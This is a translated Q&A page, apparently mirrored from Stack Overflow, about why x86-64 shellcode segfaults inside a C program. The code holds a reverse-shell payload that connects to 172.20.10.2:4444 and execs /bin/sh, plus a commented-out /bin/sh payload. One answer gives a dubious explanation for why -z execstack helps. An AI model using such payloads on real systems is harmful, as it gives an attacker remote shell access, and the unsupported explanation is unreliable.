shellcode有效,但在自定义C程序中无效
[英]shellcode working , but no in a custom C program
问题描述
my payload asm works , but I tried to embed to my own c program it works. 
我的有效载荷asm有效,但是我尝试将其嵌入到自己的c程序中。 conect to my nc port 4444 then brake the conection . 连接到我的nc端口4444,然后制动连接。 I dont why this it happen if I tested this example on my asm executable and it works perfectly , but on my c program not. 我不知道如果在我的asm可执行文件上测试了此示例,并且它可以完美运行,但在我的c程序上却没有,为什么会发生这种情况。 what can I do ? 我能做什么 ? how can I debug it? 我该如何调试?
#include <stdio.h>
unsigned char random[] = "0E249hvzColk1lZ4Vk1eccJM07x2FuitUVsliNPA5FybQn-Ny7DQJ0t-JCvDnm-mZY8YkyOtj6xgN1AUKzcBtr9rRCdGlZCjNnOKGbMzfpQQUampvZsqE0MRDhcvyvpOWzqZG5QJGBuL4-u0MipHq1ioOyNdcWcsRF0zPBd7iI76tTK5CPeDhklfSNQKaw50tsA1lEXDl7mVcvre9b6I-cUR1hYg2oLC6W0zwznvIizbea21OOB9oke5hYdWSSmI181bwvP6IuR20HIu1rGjKgnjHbClcMt9DWBOHBrtxSVUddgparNs5mR3lK3AtY85DN9W2ikX0lOSZbgcB47KC-wSGYRWOuqj1G8ebqUIArlnGk1TBKdwmezfz7RXHsa0EBlFRz60H9lDyQjJb31e78Ff1xXsFEJ5mnkU9rL5NDxPxyOkqxQoO1-6iR62feGLvQdUKfqXF2G0X8NMYqx0UWa78ezsOGsqdnwU5ktwMm2jaPZ5F1G8GKJFYGr7SXz6";
//\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05 64 bits shell
unsigned char shellcode[] = "\x68\xac\x14\x0a\x02\x66\x68\x11\x5c\x66\x6a\x02\x6a\x2a\x6a\x10\x6a\x29\x6a\x01\x6a\x02\x5f\x5e\x48\x31\xd2\x58\x0f\x05\x48\x89\xc7\x5a\x58\x48\x89\xe6\x0f\x05\x48\x31\xf6\xb0\x21\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\x7e\xf3\x48\x31\xc0\x48\xbf\x2f\x2f\x62\x69\x2f\x73\x68\x48\x31\xf6\x56\x57\x48\x89\xe7\x48\x31\xd2\xb0\x3b\x0f\x05";
int main(void){
((void (*)())shellcode)();
}
./custom
Segmentation fault (core dumped)
2 个解决方案
解决方案1
1 2018-11-08 05:04:32
You are trying to convert an object pointer shellcode to a function pointer in the following statement: 您正在尝试在以下语句中将对象指针shellcode转换为函数指针:
((void (*)())shellcode)();
This can lead to undefined behaviour. 这可能导致不确定的行为。
C99 standard states this on the section on function pointers: C99标准在函数指针的一节中对此进行了说明:
Even with an explicit cast, it is invalid to convert a function pointer to an object pointer or a pointer to void, or vice versa.
You can see this when you compile your code with -pedantic-errors option in GCC which gives the following error. 当您在GCC中使用-pedantic-errors选项编译代码时,会看到以下错误。
<source>: In function 'main':
<source>:11:6: error: ISO C forbids conversion of object pointer to function pointer type [-Wpedantic]
解决方案2
1 2019-04-16 07:00:22
The solution to this is probably setting the executable stack option during compilation by using the -z execstack with GCC. 解决方案可能是在编译期间通过将-z execstack与GCC一起设置可执行堆栈选项。
It has something to do with the way the shellcode is being called via a pointer to a function. 它与通过指向函数的指针调用shellcode的方式有关。 The pointer is being passed around and ends up being on the stack during the call trampoline, and so the stack must be executable for it to work. 指针在调用蹦床期间被传递并且最终在堆栈上,因此堆栈必须是可执行的才能起作用。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.